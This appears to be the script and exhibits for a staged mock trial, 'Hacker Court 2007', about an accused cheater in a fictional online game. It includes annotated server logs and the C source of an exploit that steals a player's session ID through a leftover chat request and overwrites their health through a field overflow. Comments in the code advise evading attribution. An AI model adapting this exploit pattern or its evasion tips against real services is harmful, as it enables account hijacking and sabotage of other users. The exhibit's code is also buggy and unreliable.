Hacker Court 2007 [email protected]. CAST JUDGE: Richard Salgado – Attorney, Former Senior Counsel of CCIPS division of DoJ COURT CLERK: Caitlin Klein

Hacker Court 2007

[email protected]

CASTJUDGE: Richard Salgado – Attorney, Former Senior Counsel of CCIPS

division of DoJCOURT CLERK: Caitlin Klein EMCEE: Carole Fennelly, Senior Security Engineer, Tenable Network SecurityPROSECUTOR : Jennifer Granick, Director, Center for Internet and the Law,

Stanford UniversityDEFENSE ATTORNEY: Kevin Bankston – Attorney, Electronic Frontier

FoundationCASE AGENT (TSA – AGENT SMITH): Brian Martin – AttritionPROSECUTION EXPERT: Jesse Kornblum– Former Captain, USAFOSIGETTA INDUSTRIES CEO, MICHAEL BAGGINS: Richard Thieme –

President, ThiemeworksGETTA INDUSTRIES IT DIRECTOR, FREDO BAGGINS: Jonathan Klein –

Regional Security Director - North, Calence, LLCDEFENDANT (DAVID NELSON): Ryan Bulat - Intern, Wizard’s Keys Corp.DEFENSE EXPERT (Jeffrey Liebowski): Simple Nomad - NMRC

Schedule

18:30 – Introductions, Court Called to Order

18:35 – 19:05 Opening Statements

19:05 – 19:20 Michael Baggins

19:20 – 19:35 Fredo Baggins

19:35 – 19:50 Agent Smith

19:50 – 20:05 Jesse Kornblum

20:05 – 20:15 break

20:15 – 20:30 Jeffrey Liebowski

20:30 – 20:45 Closing Statements

20:45 – 21:15 panel discussion

Witness classification

Factual: testifies to events directly witnessed or observed. May only testify regarding facts, not draw conclusions.

Expert: specifically qualified by the court as an expert in the subject at hand. May offer opinion and draw conclusions based on knowledge and expertise.

Prosecution Opening Statement

Enter Key Points Here

Defense Opening Statement

Enter Key Points Here

Prosecution Witness 1

Michael Baggins is the President of Getta Industries testifying as a factual witness on impact to his company based on David Nelson’s Actions.


Fredo Baggins is the not so bright younger brother of Michael Baggins. He is the IT Director of Getta Industries testifying as a factual witness on impact to his company based on David Nelson’s Actions.

Defense Exhibit 1


Agent Smith is the TSA Case Agent. He is testifying as a factual and expert witness on the search of David Nelson’s personal affects.

Stipulations

Factual: an agreement between prosecution and defense on particular facts, eliminating the need for testimony.

Testimonial: an agreement between prosecution and defense that a particular witness would testify in the manner stipulated, if called to the stand.

Government Exhibit 1

DISCLAIMER: The following document is a fictionalized testimonial stipulation for the Black Hat 2003 Conference. The witness of the stipulation does not exist, nor was any evidence in this matter gathered.

__________________________________ x |UNITED STATES OF AMERICA, |

|-v.- |

| STIPULATIONDavid Nelson, | | | |

Defendant, | |

__________________________________

IT IS HEREBY STIPULATED AND AGREED between the United States of America, Jennifer Granick, Assistant United States Attorney, of counsel, and the defendant DAVID NELSON, by his attorney Kevin Bankston, Esq.:

If called as a witness, Gob Bluth, would testify as follows:

1) He’s the Policy Enforcement officer at Bluth Industries Internet Access division(bluth.com) which is located in Orange County, California.

2) bluth.com provides high speed internet access to the Maryland area. Internet access is provided by Digital Subscriber Line (DSL) and Dialup-Connection.

3) When a subscriber connects to the bluth.com backbone, the subscriber is provided with an Internet Protocol (IP) address that is unique to the subscriber during their session

4) bluth.com is assigned the Class B address 66.137.0.0 and 63.214.247.170 by the American Registry of Internet Numbers (ARIN) to provide IP addresses for its customers.

Government Exhibit 1-2

4) Mr. Bluth has reviewed the business records maintained by bluth.com for June 15 th – July 15th, 2006 and determined that IP address 63.214.247.170 was assigned to the computer owned by Mr. David Nelson, 1445 West End Ave, Burbank, CA

5) Mr. Bluth has reviewed the business records maintained by bluth.com for June 15 th – July 15th, 2006 and determined that IP address 66.137.228.186 was assigned to the computer owned by Ms. Betty Nelson, 1420

6) West End Ave, Burbank, CA7) Mr. Bluth has reviewed the business records maintained by bluth.com for June 15 th – June 15th, 2006 and

determined that the above IP address were active during those times.

IT IS FURTHER STIPULATED AND AGREED that this stipulation may be received in evidence as a Government exhibit at trial.

Dated: July 1, 2007By:____________________________ JENNIFER GRANICK Assistant United States Attorney

By: ___________________________ KEVIN BANKSTON, ESQ. Attorney for David Nelson

Prosecution Exhibit 2

Output of /var/log/mom.log

Jul 27 14:14:33 localhost momd: UserLogonRequest for Talisman from 207.132.116.25

Jul 27 14:14:33 localhost momd: UserLogonSuccessful for Talisman from 207.132.116.25

Jul 27 14:14:33 localhost momd: RequestUserSessionId for Talisman from 207.132.116.25

Jul 27 14:14:33 localhost momd: ReplyUserSessionId for Talisman to 207.132.116.25 (0x9816a7b7)

Jul 27 16:01:16 localhost momd: UserLogonRequest for CrimsonKnight from 66.137.228.186

Jul 27 16:01:16 localhost momd: UserLogonSuccessful for CrimsonKnight from 66.137.228.186

Jul 27 16:01:16 localhost momd: RequestUserSessionId for CrimsonKnight from 66.137.228.186

Jul 27 16:01:17 localhost momd: ReplyUserSessionId for CrimsonKnight to 66.137.228.186 (0xfa453c90)

Jul 27 16:05:59 localhost momd: UserLogonRequest for GalleySlave from 63.214.247.170

Jul 27 16:05:59 localhost momd: UserLogonSuccessful for GalleySlave from 63.214.247.170

Jul 27 16:05:59 localhost momd: RequestUserSessionId for GalleySlave from 63.214.247.170

Jul 27 16:05:59 localhost momd: ReplyUserSessionId for GalleySlave from 63.214.247.170 (0xaf049289)

Jul 27 16:05:59 localhost momd: RequestChatP GalleySlave (0xaf049289) to Talisman - 63.214.247.170

Jul 27 16:05:59 localhost momd: ReplyChatP Talisman (0x9816a7b7) for GalleySlave (0xaf049289) - 63.214.247.170

Jul 27 16:06:00 localhost momd: UpdateScreenName for Talisman from 63.214.247.170 (0x9816a7b7)

Jul 27 16:06:05 localhost momd: UserEvent 0x122 - CrimsonKnight -> Talisman




Jul 27 16:07:38 localhost momd: InventoryUpdate for CrimsonKnight from 66.137.228.186

Jul 27 16:07:38 localhost momd: UserLogoff for CrimsonKnight from 66.137.228.186

Jul 27 16:07:38 localhost momd: UserEvent 0x215 - Talisman

Jul 27 16:09:01 localhost momd: AutoLogoff for GalleySlave from 63.214.247.170


Output from /var/log/mom.log - annotated

User Talisman logs in:

Jun 27 14:14:33 localhost momd: UserLogonRequest for Talisman from 207.132.116.25

Jun 27 14:14:33 localhost momd: UserLogonSuccessful for Talisman from 207.132.116.25

Jun 27 14:14:33 localhost momd: RequestUserSessionId for Talisman from 207.132.116.25

Jun 27 14:14:33 localhost momd: ReplyUserSessionId for Talisman to 207.132.116.25 (0x9816a7b7)

User CrimsonKnight logs in:

Jun 27 16:01:16 localhost momd: UserLogonRequest for CrimsonKnight from 66.137.228.186

Jun 27 16:01:16 localhost momd: UserLogonSuccessful for CrimsonKnight from 66.137.228.186

Jun 27 16:01:16 localhost momd: RequestUserSessionId for CrimsonKnight from 66.137.228.186

Jun 27 16:01:17 localhost momd: ReplyUserSessionId for CrimsonKnight to 66.137.228.186 (0xfa453c90)

User GalleySlave logs in:

Jun 27 16:05:59 localhost momd: UserLogonRequest for GalleySlave from 63.214.247.170

Jun 27 16:05:59 localhost momd: UserLogonSuccessful for GalleySlave from 63.214.247.170

Jun 27 16:05:59 localhost momd: RequestUserSessionId for GalleySlave from 63.214.247.170

Jun 27 16:05:59 localhost momd: ReplyUserSessionId for GalleySlave from 63.214.247.170 (0xaf049289)

User GalleySlave uses old RequestChatP and gets Talisman's session ID:

Jun 27 16:05:59 localhost momd: RequestChatP GalleySlave (0xaf049289) to Talisman - 63.214.247.170

Jun 27 16:05:59 localhost momd: ReplyChatP Talisman (0x9816a7b7) for GalleySlave (0xaf049289) - 63.214.247.170

User Talisman updates his screenname to Talisman from GalleySlave's IP address

Jun 27 16:06:00 localhost momd: UpdateScreenName for Talisman to Talisman from 63.214.247.170 (0x9816a7b7)

Prosecution Exhibit 3-2

5 seconds later CrimsonKnight challenges Talisman to battle (UserEvent 0x122)

Jun 27 16:06:05 localhost momd: UserEvent 0x122 - CrimsonKnight -> Talisman

1 second later CrimsonKnight uses magic against Talisman (UserEvent 0x123)


1 second later CrimsonKnight damages Talisman (UserEvent 0x128)


1 second later CrimsonKnight kills Talisman (UserEvent 0x188)


Minute and a half later CrimsonKnight updates inventory (more than likely with battlespoils) and logs off

Jun 27 16:07:38 localhost momd: InventoryUpdate for CrimsonKnight from 66.137.228.186

Jun 27 16:07:40 localhost momd: UserLogoff for CrimsonKnight from 66.137.228.186

Talisman resurrects from the dead (UserEvent 0x215)

Jun 27 16:07:56 localhost momd: UserEvent 0x215 - Talisman

3 minutes after last activity from GalleySlave with no activity, he is logged off

Jun 27 16:09:01 localhost momd: AutoLogoff for GalleySlave from 63.214.247.170


Jesse Kornblum is an independent government contractor assigned to the TSA. He is testifying as a factual and expert witness on his forensic examination of David Nelson’s computer.


/*

* Crimson Death

* Written by Crimson Knight <[email protected]>

*

* Background

* ----------

* Ok, how this works is simple. The golden_fleece exploit allowed you

* to update your health and stay strong during battle, but if you have

* the victim's current session id you can reset his health for him.

* Since the session id is treated like a password, all you need is

* the session id, no stealing of passwords required. During the first

* beta of MoM, the peer-to-peer chat system actually gave you the

* session id, but peer-to-peer chat was eliminated after the first

* beta.

*

* Or so we thought!

*

* The code is still in the server software! All we need to do is send

* the old RequestChatP and the server replies with the victim's session

* id as well as the IP address. Then you simply send in the

* UpdateScreenName request with a modified health value and the victim's

* session id, and the health is updated!

*

* Caveats

* -------

* You can drop anyone's health online, however if no one is near them

* and they are not in battle, any self-healing will kick in and they do

* not die. Plus it is more fun to watch them drop! So get close enough


* for any type of interaction (does not have to be battle), and launch

* the exploit. Since you are close to them, the evaluation routines that

* determine battle and conversation levels for interaction are active

* on the server, and you get an instant reaction.

*

* You cannot damage the health of familiars, monsters, and other NPCs,

* just fellow users.

*

* Damage

* ------

* There are three damage types, temp kill, perm kill, and near kill:

*

* Option 1 - Temp kill. This damage lowers the health of the victim

* to 0, rendering them dead instantly. They can resurrect as normal.

*

* Option 2 - Perm kill. The health is set to 2147483648. While this

* may seem wrong, it passes the checks and is used for comparison as

* a signed integer instead of an unsigned integer, making the value

* -1. During the experience and karma adjustments after the kill, this

* causes values in the user profile to become invalid, and the user

* profile is totally unuseable! Nothing, including inventory can be

* recovered. The user profile can not and will not resurrect!

*

* Option 3 - Near kill. This damage lowers the health to 1, leaving

* them vulnerable to a quick and easy kill. All spoils of war rules

* are in affect.

*

* Prevention

* ----------

* Disable all chat capabilities in your profile before use. We usually

* use Skype to communicate anyway, so this isn't a big deal. If you

* must communicate with other non-clan folk, use a familiar.

*


* Tips

* ----

* 1. Do not run the exploit from your home computer, especially the

* same computer you game from! It can run on a separate computer, so

* use a shell on a different system. The exploit does not require root

* to run. Although Getta seems incompetent when it comes to catching

* cheaters, they may be logging IP addresses.

* 2. Do not use your main user id and password. Use a secondary account,

* ask around the clan as someone always has some extra accounts, and

* any valid account will work.

* 3. If you time the exploit using damage option 3 and a fireball,

* frost, or shock spell, the victim will simply assume your spell is

* massively powerful and not notice their health dropped before the

* spell actually hit them.

* 4. Use damage option 2 sparingly. It will draw needless attention to

* the flaw. Use it only for those assholes most deserving!

*

* -Crim

*/

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <netdb.h>

#include <unistd.h>

#include <signal.h>


/* for reference, this is incomplete but this is all we need...

* it is based upon the golden_fleece exploit which allows overwriting

* the health, stamina, etc of your own character

struct userprofile

{

uint32 userid;

uint32 name_len;

char name[64];

uint32 health;

uint32 stamina;

uint32 experience;

uint32 level;

etc etc...

} up;

*/

#define VERSION "1.0"

#define MAXBUF 512

#define SERVER "66.137.228.188"

#define PORT 17230

/* shorthand */

typedef unsigned char uint8;

typedef unsigned short uint16;

typedef unsigned long uint32;

/* globals */

char buffer_out[MAXBUF];

char buffer_in[MAXBUF];

uint32 my_session_id;

uint32 victim_session_id;


void clean_buf(void)

{

memset(buffer_out,0,MAXBUF);

memset(buffer_in,0,MAXBUF);

}

void caughtsig(int sig)

{

fprintf(stdout,"Operation timed out\n");

exit(sig);

}

void usage(char *prog)

{

fprintf(stderr,"USAGE: ");

fprintf(stderr,"%s -u yourid -p yourpassword -v victimid [opts]\n\n",prog);

fprintf(stderr," opts are k t h\n");

fprintf(stderr," -d type type is 0 for temp kill,\n");

fprintf(stderr," 1 for perm kill, and 2 for\n");

fprintf(stderr," near kill\n");

fprintf(stderr," -t timeout timeout in seconds (default 10)\n");

fprintf(stderr," -h this help screen\n");

fprintf(stderr,"\n");

}

typedef struct RequestUserSessionId

{

uint32 header; // always \xff\xff\xff\xff

uint32 mom1; // always \x4d\x6f\x4d\x31

uint32 command; // always \x04\x01\x00\x00

uint32 userid_len;// length of user id

char userid[64]; // user id


uint32 pass_len; // length of password

char password[64]; // password

uint32 tail; // always \xff\xff\xff\xff

} requestusersessionid;

typedef struct ReplyUserSessionId

{



uint32 command; // always \x05\x01\x00\x00

uint32 id; // session id;

} replyusersessionid;

// ChatP protocol left over from beta1, but still supported on

// MoM servers, the P was for peer-to-peer, not supported on

// MoM client side since beta2.

typedef struct RequestChatP

{



uint32 command; // always \x01\x0a\x00\x00

uint32 id; // our session id

uint32 chat_len; // length of victim chat name

char name[64]; // victim's chat name

uint32 random; // ???

} requestchatp;

// Note the reply contains the victim's current session ID and

// ip address, what the fuck were they smoking? LOLZ

typedef struct ReplyChatP

{




uint32 command; // always \x02\x0a\x00\x00

uint32 id; // victim's session id! wtf!

uint32 ip; // victim's ip address

uint16 udp_port; // victim's chat port

uint16 unknown1;// always \xff\xff

uint32 random; // ???

} replychatp;

typedef struct CrimsonDeath

{



uint32 command; // always \x0a\x07\x00\x00

uint32 id; // session id (like the password!)

uint32 name_len; // length of new name, make it 68 to overwrite

// victim's health on the server!

char name[64]; // 64 plus 4 bytes to overwrite health

uint32 health; // 0 means death, 2147483648 means perm death!

// (it corrupts the userprofile, but no loot)

// 1 means they are very very easy to kill and

// you can grab stuff they drop!

} crimdeath;

int send_udp(int size)

{

int s,rc;

struct sockaddr_in serveraddr;

struct hostent *hostp;

char *bufptr = buffer_out;

if((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)

{

perror("send_udp: socket() error");

exit(-1);


}

memset(&serveraddr,0,sizeof(struct sockaddr_in));

serveraddr.sin_family = AF_INET;

serveraddr.sin_port = htons(PORT);

{

hostp = gethostbyname(SERVER);

if(hostp == (struct hostent *)NULL)

{

printf("HOST NOT FOUND --> ");

printf("h_errno = %d\n", h_errno);

exit(-1);

}

memcpy(&serveraddr.sin_addr, hostp->h_addr, sizeof(serveraddr.sin_addr));

}

rc = sendto(s, bufptr, size, 0, (struct sockaddr *)&serveraddr, sizeof(serveraddr));

if(rc < 0)

{

perror("send_udp: sendto() error");

close(s);

exit(-1);

}

return(s);

}

int recv_udp(int s)

{

int rc;

struct sockaddr_in serveraddr;

int serveraddrlen = sizeof(serveraddr);

char *bufptr = buffer_in;

int buflen = sizeof(buffer_in);

memset(&serveraddr,0,sizeof(struct sockaddr_in));

rc = recvfrom(s, bufptr, buflen, 0, (struct sockaddr *)&serveraddr, (socklen_t *)serveraddrlen);

close(s);

return(rc);

}


int get_our_session_id(char *name, char *password)

{

struct RequestUserSessionId *reqsessid;

struct ReplyUserSessionId *repsessid;

int rc;

if((reqsessid = malloc(sizeof(struct RequestUserSessionId))) == NULL)

{

perror("get_our_session_id: malloc() error\n");

exit(-1);

}

memset(&reqsessid,0,sizeof(struct RequestUserSessionId));

if((repsessid = malloc(sizeof(struct ReplyUserSessionId))) == NULL)

{

perror("get_our_session_id: malloc() error\n");

exit(-1);

}

memset(&repsessid,0,sizeof(struct ReplyUserSessionId));

reqsessid->header = 0xffffffff;

reqsessid->mom1 = 0x314d6f4d;

reqsessid->command = 0x104;

reqsessid->userid_len = strlen(name);

memcpy(&reqsessid->userid,name,strlen(name));

reqsessid->pass_len = strlen(password);

memcpy(&reqsessid->password,password,strlen(password));

reqsessid->tail = 0xffffffff;

clean_buf();

memcpy(&buffer_out,reqsessid,sizeof(reqsessid));

rc = recv_udp(send_udp(sizeof(reqsessid)));

memcpy(&repsessid,buffer_in,sizeof(repsessid));


if(repsessid->command == 0x105)

{

my_session_id = repsessid->id;

rc = 1;

}

else

{

rc = -1;

}

free(reqsessid);

free(repsessid);

return(rc);

}

int get_victim_session_id(char *victim)

{

struct RequestChatP *reqchatp;

struct ReplyChatP *repchatp;

int rc;

if((reqchatp = malloc(sizeof(struct RequestChatP))) == NULL)

{

perror("get_victim_session_id: malloc() error\n");

exit(-1);

}

memset(&reqchatp,0,sizeof(struct RequestChatP));

if((repchatp = malloc(sizeof(struct ReplyChatP))) == NULL)

{

perror("get_victim_session_id: malloc() error\n");

exit(-1);

}

memset(&repchatp,0,sizeof(struct ReplyChatP));


reqchatp->header = 0xffffffff;

reqchatp->mom1 = 0x314d6f4d;

reqchatp->command = 0xa01;

reqchatp->id = my_session_id;

reqchatp->chat_len = strlen(victim);

memcpy(&reqchatp->name,victim,strlen(victim));

reqchatp->random = 0xaddeadde;

clean_buf();

memcpy(&buffer_out,reqchatp,sizeof(reqchatp));

rc = recv_udp(send_udp(sizeof(reqchatp)));

memcpy(&repchatp,buffer_in,sizeof(repchatp));

if(repchatp->command == 0x102)

{

victim_session_id = repchatp->id;

rc = 1;

}

else

{

rc = -1;

}

free(reqchatp);

free(repchatp);

return(rc);

}

void crimson_death(char *victim, int damage)

{

struct CrimsonDeath *crimsondeath;

int rc;


if((crimsondeath = malloc(sizeof(struct CrimsonDeath))) == NULL)

{

perror("crimson_death: malloc() error\n");

exit(-1);

}

memset(&crimsondeath,0,sizeof(struct CrimsonDeath));

crimsondeath->header = 0xffffffff;

crimsondeath->mom1 = 0x314d6f4d;

crimsondeath->command = 0x70a;

crimsondeath->id = victim_session_id;

crimsondeath->name_len = 68;

memcpy(&crimsondeath->name,victim,strlen(victim));

switch(damage)

{

case 0:

crimsondeath->health = 0;

break;

case 1:

crimsondeath->health = 0x80000000;

break;

case 2:

crimsondeath->health = 1;

break;

}

clean_buf();

memcpy(&buffer_out,crimsondeath,sizeof(crimsondeath));

rc = send_udp(sizeof(crimsondeath));

free(crimsondeath);

}

// end post arg processing


/*

* main

*/

int main(int argc, char **argv)

{

char *prog;

char *userid;

char *password;

char *victim;

char ch;

int damage,rc,timeout = 10,u=0,v=0,p=0;

prog = argv[0];

fprintf(stdout,"Crimson Death v%s\n",VERSION);

fprintf(stdout,"Written by Crimson Knight <[email protected]>\n\n");

while ((ch = getopt(argc, argv, "u:p:v:k:h?t:")) != EOF)

switch(ch)

{

case 'k':

damage = (int)strtol(optarg,NULL,10);

if((damage < 0) || (damage > 2))

{

fprintf(stdout,"Error: invalid damage type\n");

usage(prog);

exit(-1);

}

break;


case 'u':

userid = optarg;

u++;

break;

case 'p':

password = optarg;

p++;

break;

case 'v':

victim = optarg;

v++;

break;

case 't':

timeout = (int)strtol(optarg,NULL,10);

if(timeout<10) timeout = 10;

if(timeout>100)

{

fprintf(stdout,"Error: timeout value too high\n");

usage(prog);

exit(-1);

}

break;

case 'h':

case '?':

usage(prog);

exit(0);

default:

fprintf(stdout,"Error: unknown option\n");

usage(prog);

exit(-1);

}


// post arg processing

if(!u)

{

fprintf(stdout,"Error: -u option needs a userid\n");

usage(prog);

exit(-1);

}

if(!p)

{

fprintf(stdout,"Error: -p option needs a password\n");

usage(prog);

exit(-1);

}

if(!v)

{

fprintf(stdout,"Error: -v option needs a victim\n");

usage(prog);

exit(-1);

}

if(!damage)

{

fprintf(stdout,"Using default of 0 damage (temp kill)\n");

damage = 0;

}


// time for evil...

signal(SIGALRM, caughtsig);

alarm(timeout);

fprintf(stdout,"[+] Getting our session ID\n");

rc = get_our_session_id(userid,password);

alarm(0);

if(rc == 1)

fprintf(stdout,"[+] Done!\n");

else

{

fprintf(stdout,"[-] Failed!\n");

exit(-1);

}

alarm(timeout);

fprintf(stdout,"[+] Getting %s session ID\n",victim);

rc = get_victim_session_id(victim);

alarm(0);

if(rc == 1)

fprintf(stdout,"[+] Done!\n");

else

{

fprintf(stdout,"[-] Failed! Is %s the correct name?\n",victim);

exit(-1);

}

fprintf(stdout,"[+] Deal out some damage....\n");

crimson_death(victim,damage);

fprintf(stdout,"[+] See if %s is still standing!\n",victim);

exit(1);

}

Defense Exhibit 2

Place holder for Jesse Photo (You didn’t think I would just put it in here)


Itemized Damages to Getta Industries

login 33003/tcp

Defense Witness 1

Jeffrey Liebowski is testifying as an expert in general computer knowledge. He is giving expert witness testimony to refute the government’s experts. He is also an avid bowler.


Picture of Liebowski

Defense Witness 2

David Nelson is the defendant and is not required to take the stand, but has the right to do so if he chooses. His attorney should discourage him from doing so, since the judge can add extra points to his sentence for perjury and obstruction of justice, if he is found guilty.

Prosecution Closing Statements


Picture of ”The Dude”

Defense Closing Statements

Panel Discussion

Documents

Hacker Court 2007 [email protected]. CAST JUDGE: Richard Salgado – Attorney, Former Senior Counsel of CCIPS division of DoJ COURT CLERK: Caitlin Klein